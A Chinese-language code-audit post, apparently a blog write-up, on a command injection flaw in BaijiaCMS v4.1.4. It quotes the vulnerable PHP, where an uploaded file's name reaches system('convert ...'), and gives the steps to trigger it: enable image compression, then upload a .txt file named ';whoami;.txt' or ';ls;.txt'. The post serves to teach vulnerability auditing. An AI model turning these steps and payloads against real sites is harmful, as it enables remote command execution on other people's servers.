【命令执行】【百家商城cmsv4.1.4】
命令执行:
system exec shell_exec `` passthru pcntl_exec popen proc_open
1.查找system()函数在路径includes/baijiacms/common.inc.php,$quality_command由intval()控制,无法利用。
intval() 函数用于获取变量的整数值。
function file_save($file_tmp_name,$filename,$extention,$file_full_path,$file_relative_path,$allownet=true) { echo $file_full_path; $settings=globaSystemSetting(); if(!file_move($file_tmp_name, $file_full_path)) { return error(-1, '保存上传文件失败'); } if(!empty($settings['image_compress_scale'])) { $scal=$settings['image_compress_scale']; $quality_command=''; if(intval($scal)>0) { $quality_command=' -quality '.intval($scal); } system('convert'.$quality_command.' '.$file_full_path.' '.$file_full_path); echo 'convert'.$quality_command.' '.$file_full_path.' '.$file_full_path; }
2.观察$file_full_path满足if条件后由file_save()传入,通过查找image_compress_scale参数,发现需开启图片压缩比例功能。
system/manager/template/web/netattach.php
<div class="form-group"> <label class="col-xs-12 col-sm-3 col-md-2 control-label">图片压缩比例<br/>(推荐80%)</label> <div class="col-sm-9 col-xs-12"> <label class="radio-inline"> <input type="radio" name="image_compress_openscale" value="0" <?php if(empty($settings['image_compress_openscale'])) { ?>checked="true"<?php } ?>> 关闭 </label><label class="radio-inline"> <input type="radio" name="image_compress_openscale" value="1" <?php if(!empty($settings['image_compress_openscale'])) { ?>checked="true"<?php } ?>>开启 </label><label class="radio-inline"> <input type="text" name="image_compress_scale" style="width:50px" value="<?php echo $settings['image_compress_scale'];?>" />% </label>
3.file_save()函数通过搜索用法后观察setting.php是直接调用该函数。
3.如何触发file_save()函数
访问http://10.22.56.23:8085/index.php?mod=site&act=weixin&do=setting上传,观察源码需上传非空的txt文件
if (!empty($_FILES['weixin_verify_file']['tmp_name'])) { $file=$_FILES['weixin_verify_file']; $extention = pathinfo($file['name'], PATHINFO_EXTENSION); $extention=strtolower($extention); if($extention=='txt') { $substr=substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/')); if(empty( $substr)) { $substr="/"; } $verify_root= substr(WEB_ROOT."/",0, strrpos(WEB_ROOT."/", $substr))."/"; //file_save($file['tmp_name'],$file['name'],$extention,$verify_root.$file['name'],$verify_root.$file['name'],false); file_save($file['tmp_name'],$file['name'],$extention,WEB_ROOT."/".$file['name'],WEB_ROOT."/".$file['name'],false);iu
4.修改源码测试输出system执行的命令
system('convert'.$quality_command.' '.$file_full_path.' '.$file_full_path); echo 'convert'.$quality_command.' '.$file_full_path.' '.$file_full_path;
convert /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/;whoami;.txt /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt
convert /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt /Users/xxx/Desktop/yuanma/baijiacmsV4-4.1.4/123.txt
5.修改文件名为;ls;.txt让其执行payload
思路:
system()要执行有两个参数,$quality_command和$file_full_path,$quality_command因为intval不能用,$file_full_path需要满足if条件image_compress_openscale不为空,开启netattach.php的图片压缩功能,通过setting.php调用file_save()函数传入$file['name']参数从而控制$file_full_path,让system()执行。
浙公网安备 33010602011771号